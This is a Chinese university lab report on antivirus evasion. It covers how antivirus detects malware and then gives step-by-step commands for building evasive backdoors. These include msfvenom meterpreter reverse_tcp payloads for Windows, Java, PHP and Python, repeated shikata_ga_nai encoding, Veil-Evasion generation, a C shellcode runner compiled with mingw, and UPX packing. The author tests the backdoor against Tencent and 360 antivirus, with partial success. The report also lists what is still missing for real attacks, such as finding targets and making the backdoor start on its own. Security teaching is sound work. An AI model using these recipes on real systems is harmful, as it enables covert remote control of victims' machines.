2018-2019-2 网络对抗技术 20165335 Exp3 免杀原理与实践

一.免杀原理与基础知识:
  (1)杀软是如何检测出恶意代码的?
    检测特征码:特征码就是一般程序都不会有的代码,而后门有的那种特别的数据,而一个程序,应用有这种代码,数据的话,就直接判定为恶意代码。
          主流的后门生成一般都在检测的库里面,主要还是检测一段数据与代码
    
    启发式恶意软件检测:看这个软件,程序的特点啥,看他的特征是不是一个正常应用程序很想,如果不是就判断为恶意代码,很笼统,不咋精确
    基于行为的恶意软件检测:在启发式的基础上加了行为监控,看他到底干了啥,监控他的行为,通过程序的运行来判断是不是恶意代码
  (2)免杀是做什么?
    免杀就是在其他机器上放一个后门进去,能够不被杀软给检测到他是一个后门,让后门成功潜伏下来
    主要用于对系统进行渗透测试。
  (3)免杀的基本方法有哪些?
    从第一个问题出发,只要绕过杀软的检测就可以成功免杀
      对于检测特征码:
        可以对.exe文件进行加壳处理,压缩或者加密的方式改变特征码
        对于有代码的后门来说,可以利用编码器进行多次编码,也可以将代码用其他的编程语言实现,重编译
      对于启发式以及行为检测:
        可以反弹连接,绕过防火墙等的检测
        可以加密数据,防止你检测数据,也可以使用IPSec协议进行二次封装,防止检测用户数据
        操作的时候尽量少的修改系统文件,也可以让自己的后门实现一些正常的功能
    

任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧

先来看看我们在实验2生成后门文件,看看那个没有任何免杀处理的普通后门程序被杀软检测的情况:

 看来,这种后门基本会被检测出来。

   1. 正确使用msf编码器,生成exe文件
     首先使用msfvenom -l encoders 查看编码器,来决定使用什么编码器进行处理

  实用指令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.171.130 LPORT=5335 -f exe > encodedone.exe指令生成一个一次编码的后门

  -e选择编码器,-b表示payload去掉的字符,因为\x00表示字符串结束,防止在中途被判定为结束

  扫描结果如下:

效果很一般! 

那么,多编码几次试试,看看多次又没有效果:

十次编码使用命令:-i设置迭代次数
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.171.130 LPORT=5335 -f exe > encodedtwo.exe

貌似.....也就那样,既然编码,就会有解码,只要检测解码的特征码,还算比较容易检测的,效果还是不理想 

 2. msfvenom生成jar文件

  生成java后门程序使用命令:
  msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.171.130 LPORT=5335 x> backdoorjava.jar

还是不会被多数的抓到

生成PHP后门程序使用命令:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.171.130 LPORT=5335 x> phpbackdoor.php

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.171.130 LPORT=5335 x> pybackdoor.py

用php二次编码效果计较显著

生成python文件

python的效果也比较好吧

看来,php能检测出来的不是很多哈......可能是因为java,python比较常用

kali中指令输入如下:

3. 使用veil-evasion生成后门程序及检测

  1.安装veil

  由于安装的版本为18版本,先进行更新

  mkdir -p ~/.cache/wine

  cd ~/.cache/wine wget

  http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi wget

  http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

    在使用sudo apt-get install veil-evasion指令安装veil

    安装完毕后,输入veil指令:

说明安装已成功

用usre evasion进入Evil-Evasion

输入命令use c/meterpreter/rev_tcp.py进入配置界面

设置反弹连接IP,命令为:set LHOST 192.168.171.136,此处的IP是KaliIP

输入generate生成文件,然后给payload起一个名字

 检测结果如下:

半手工注入Shellcode并执行

  使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.171.136 LPORT=5335 -f c指令产生代码,然后半手工修改

  出现以下的代码:

 

创建文件,并将C代码输入字符串中:

unsigned char buf[] = "将获得的字符串粘贴";

int main()

{

  int (*func)() = (int(*)())buf;

   func();

      }

使用命令i686-w64-mingw32-g++ 20165335outdoor.c -o 20165335outdoor.exe编译,生成一个.exe文件

 

将后门进行检测:

任务二:通过组合应用各种技术实现恶意代码免杀

  在实验1中所生成的所有后门中,veil生成的后门outdoorone在进行杀软检测时,依旧会被很多杀软杀出来,但也逃过了一些杀软的检测,所以我就想对后门outdoorone.exe在进行进一步的加工处理

  使用veil,python/meterpreter/rev_tcp.py 生成可执行文件,再用UPX加壳。

  使用UPX压缩壳进行二次改造

  使用的测试对象为win7虚拟机,安装的杀软为腾讯电脑管家

 

加壳尝试

  我们对之前生成的outdoorone进行加壳处理
  

 

 

   偷偷把他放在腾讯安全卫士保护下的win7中,让安全卫士安排一下这个小后门,看看有什么反应。

  

  并没有发现,再把它检测一下:

  

  看来TX不太行啊

  反弹连接试一下行不行

  

 

   ok,看来可以实现

3:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

  这个没有实现....免杀失败,被360安排的明明白白,接收后门文件扫描没啥被抓出来,在反弹连接的连接的时,被控主机反弹连接的时候被抓到提示非法连接,猜测是根据主机主动连接一个地址被抓进小黑屋了,哎难受,太菜了......

 实践总结与体会

  在本次的实践中,自己动手对实验2中的简单后门进行更加完善的处理,使得一个后门程序可以躲过杀软,对veil这个工具进行了尝试,同时对杀软的工作原理有了更加深刻的了解

  同时,熟悉并且使用了使用VirusTotal、Virscan等工具,也能狗更好的应对后门,对刘老师上课讲到了一些免杀技术,经过自己的试验后,有了更加深刻的理解
  同时,我也认识应当进一步提高安全意识,从正规网站下载,防止后门植入,同时,在看到一些要求关闭杀软的应该加以警惕。

开启杀软能绝对防止电脑中恶意代码吗?

  通过自己的实践,发现杀软对有些后门程序无法做到检测,但对于大多数的简单后门还是有防御作用。

  不同的杀软之间,对于恶意代码的检测还是有所区别,不同版本的杀软的效果也有很大差异

  还是应该i提高自身安全意识,及时的更新杀软

离实战还缺些什么技术或步骤?

  首先时确定主机,我们在实验中的主机都在同一个网段,同时,自己知道IP,并保证主机状态稳定,而真实的实战未必主机活跃并且也需要嗅探器去安排获得IP

  还有就是后门的自启动问题,实战时候的被控主机毕竟不会自己去开后门,自启动上还是有所不足

posted @ 2019-03-31 16:17  20165335  阅读(307)  评论(0编辑  收藏  举报